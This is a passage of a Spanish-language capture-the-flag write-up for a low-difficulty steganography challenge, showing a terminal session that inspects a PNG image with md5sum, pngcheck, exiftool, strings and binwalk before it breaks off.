<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Dificultad:</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> Bajo</span></div>
<a name='more'></a><br />
<b id="docs-internal-guid-28c8aafb-7fff-4126-5653-485a881c9f90" style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Objetivo</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Formato de flag: CSACTF{flag}</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><img height="282" src="https://lh6.googleusercontent.com/y6YjWxYIf_7jlkzEoQC4m3yTq4acIbgdEkiAsZdWs3KyHeWyMw-uqsagFuZZZBIoPE-1kvIW_l2nhvReWuxh1SQJEn5Fsd-lSs1F83PAZIgxsVm9ACDha4aWN65DknBf9zTfnR5G" style="border: none;" width="302" /></span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Herramientas utilizadas</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Firefox Version 60.5.1 </span><a href="https://www.mozilla.org/en-US/firefox/60.5.1/releasenotes/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://www.mozilla.org/en-US/firefox/60.5.1/releasenotes/</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">pngcheck </span><a href="http://www.libpng.org/pub/png/apps/pngcheck.html" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">http://www.libpng.org/pub/png/apps/pngcheck.html</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Stego-Toolkit </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<a href="https://github.com/DominicBreuker/stego-toolkit" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://github.com/DominicBreuker/stego-toolkit</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Resumen:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Descargamos a través del link en la parte inferior izquierda de la pantalla el archivo llamado </span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">secret_image.png</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> (f44420ba5d70d25ff35075b58df44641) y pasamos a realizar un análisis preliminar:</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># md5sum secret_new.png </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">f44420ba5d70d25ff35075b58df44641 secret_new.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># pngcheck secret_new.png </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">OK: secret_new.png (1000x1223, 24-bit RGB, non-interlaced, 86.8%).</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># exiftool secret_new.png </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">ExifTool Version Number : 11.16</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">File Name : secret_new.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Directory : .</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">File Size : 473 kB</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">File Modification Date/Time : 2019:04:25 22:24:25+02:00</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">File Access Date/Time : 2019:05:28 20:47:42+02:00</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">File Inode Change Date/Time : 2019:05:28 20:47:37+02:00</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">File Permissions : rwxrwx---</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">File Type : PNG</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">File Type Extension : png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">MIME Type : image/png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Image Width : 1000</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Image Height : 1223</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Bit Depth : 8</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Color Type : RGB</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Compression : Deflate/Inflate</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Filter : Adaptive</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Interlace : Noninterlaced</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Image Size : 1000x1223</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Megapixels : 1.2</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># strings secret_new.png</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">IHDR</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">IDATx</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">RUr`</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">1FfF</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">1</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"3b</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">#3}>(</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">%^\r9</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">]@:H</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">...</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">@```@{</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">P2h6</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">mH.zS</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">kuvv</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">6GFFn</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">D-u%</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Ea{]</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">IEND</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/CSACTF19/misc/stephanography# binwalk secret_new.png </span></div>
<br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">DECIMAL HEXADECIMAL DESCRIPTION</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">--------------------------------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">0 0x0 PNG image, 1000 x 1223, 8-bit/color RGB, non-interlaced</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">41 0x29 Zlib compressed data, default compression</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
